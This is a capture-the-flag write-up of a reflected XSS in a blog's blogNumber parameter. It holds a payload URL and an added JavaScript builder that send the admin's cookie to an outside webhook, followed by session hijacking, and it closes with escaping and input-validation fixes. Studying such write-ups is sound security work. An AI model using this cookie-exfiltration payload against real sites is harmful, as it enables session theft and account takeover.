
# Bloggergate

The challenge page took a URL and handed it to the backend for processing. When I gave it a webhook link, nothing was processed: the webhook never received a request.

But going through the site, it was clear that the goal was to make the server-side admin (the bot that visits submitted URLs) execute an HTTP request to my webhook and exfiltrate data there.

<figure><img src="/files/d2pastLx2mdb9Jd4RZp2" alt=""><figcaption></figcaption></figure>

I then used Burp Suite to submit `curl <site>` in place of the URL, but again the server didn't process anything.

So there was no command injection (RCE) either.

That left two main candidates for getting the admin to issue an HTTP request to my webhook: SSTI and XSS.

I tried SSTI, but it didn't work, so it was time to test for XSS. The URL form itself wasn't injectable. But when I clicked on the existing blog posts, I saw that the blog page accepted the post's ID (the blog number) as a GET parameter.

Observe how the blog number is reflected on the page!

<figure><img src="/files/g90SL8UtPbFMQa14RWiA" alt=""><figcaption></figcaption></figure>

Viewing the page source, I saw it reflected directly into the HTML, unescaped.

<figure><img src="/files/IEcI91n6er5fOFA6BQNX" alt=""><figcaption></figcaption></figure>

I tried injecting HTML tags so that JavaScript would run in the browser of whoever loads the URL (the script executes client-side, not on the server), and it worked:

`http://site/blog?blogNumber=%3Cscript%3Edocument.write(document.cookie);%3C/script%3E`

<figure><img src="/files/Nq68DiSsMDvhjyU8FKsV" alt=""><figcaption></figcaption></figure>

Cool cool. Let's write a simple JavaScript payload that reaches our webhook with the cookie appended to the request:

`http://18.225.156.202:9090/blog?blogNumber=2%22%3E%3Cimg%20src=x%20onerror=this.src=%27https://webhook.site/e20454b9-297d-47d2-bb93-9da689061414/?%27%2bdocument.cookie;%3E`

<figure><img src="/files/ky1Xg8rCKi2rNyJQdW94" alt=""><figcaption></figcaption></figure>

Now a request from my own browser (my IP) was reaching the webhook, initiated by the injected JavaScript. If we submit this same URL through the site's URL form, the admin bot will load it in its own browser and we'll have the admin's cookie!
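The following is an added example, not code from the original writeup. It rebuilds the reflected-XSS exfil payload used above and contrasts an assumed vulnerable template with an escaped one, so you can see exactly which characters let the payload break out and why output encoding (or integer validation of the blog number) kills it. The target and webhook URLs are the ones quoted in this writeup; the shape of the server's template (`<input ... value="...">`) is an assumption, since the challenge's server code was never shown.

```javascript
// Added example, not code from the original writeup. It reproduces the
// reflected-XSS exfil payload from this challenge and contrasts an (assumed)
// vulnerable template with an escaped one. Target and webhook URLs are the
// ones quoted in the writeup; the template shape is an assumption, since the
// server code was never shown.

const TARGET = "http://18.225.156.202:9090/blog";
const WEBHOOK = "https://webhook.site/e20454b9-297d-47d2-bb93-9da689061414/";

// The payload: '2">' closes the attribute and tag the blog number sits in,
// then an <img> with a broken src fires onerror, which rewrites its own src
// to the webhook URL with document.cookie appended as the query string.
function buildPayload(webhook) {
  return `2"><img src=x onerror=this.src='${webhook}?'+document.cookie;>`;
}

// Percent-encode the payload into the blogNumber GET parameter.
function buildExploitUrl(target, webhook) {
  return `${target}?blogNumber=${encodeURIComponent(buildPayload(webhook))}`;
}

// Assumed vulnerable rendering: the raw parameter is interpolated into an
// attribute value (this matches the '2">' break-out the payload relies on).
function renderVulnerable(blogNumber) {
  return `<input type="hidden" name="blogNumber" value="${blogNumber}">`;
}

// Hardened rendering: HTML-escape before interpolating, so the quote and
// angle brackets become entities and cannot close the attribute or open a tag.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSafe(blogNumber) {
  return `<input type="hidden" name="blogNumber" value="${escapeHtml(blogNumber)}">`;
}

// Stricter still: the parameter is a post ID, so reject anything that is
// not a small positive integer before it reaches the template at all.
function parseBlogNumber(raw) {
  return /^\d{1,9}$/.test(raw) ? Number(raw) : null;
}

// Crude check used in the demo: did a raw <img ...> tag survive into the HTML?
function containsTag(html, tag) {
  return new RegExp(`<${tag}\\b`, "i").test(html);
}

// Stand-alone demo when run with node.
if (typeof require !== "undefined" && require.main === module) {
  const payload = buildPayload(WEBHOOK);
  console.log("exploit URL:", buildExploitUrl(TARGET, WEBHOOK));
  console.log("vulnerable:", renderVulnerable(payload), containsTag(renderVulnerable(payload), "img"));
  console.log("escaped:   ", renderSafe(payload), containsTag(renderSafe(payload), "img"));
  console.log("validated: ", parseBlogNumber(payload), parseBlogNumber("2"));
}
```

Two caveats a practitioner would check before relying on this: the payload only works because the admin visits the URL in a real browser that executes the `onerror` handler (a plain fetch of the page would never fire it), and `document.cookie` only exposes cookies that are not flagged `HttpOnly`. If the session cookie had carried `HttpOnly`, the same XSS could still act on the admin's behalf from inside the page, but the cookie value itself would not leave the browser.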

<figure><img src="/files/UbGTJlCbN2zDk85UkZEZ" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/nWITXXL0ichot8ytFYxw" alt=""><figcaption></figcaption></figure>

We hit it! And the blogging site had an admin panel that we couldn't access.

<figure><img src="/files/EXX8xHQt3tGgy30ABm4B" alt=""><figcaption></figcaption></figure>

Session hijacking: by replacing our own session cookie with the newly stolen one, let's see what happens.

<figure><img src="/files/1NrsyQew1tox1VQVQUmz" alt=""><figcaption></figcaption></figure>

Upon submitting, we find the flag!

<figure><img src="/files/IdaKHgi1siEBFoh2h37a" alt=""><figcaption></figcaption></figure>
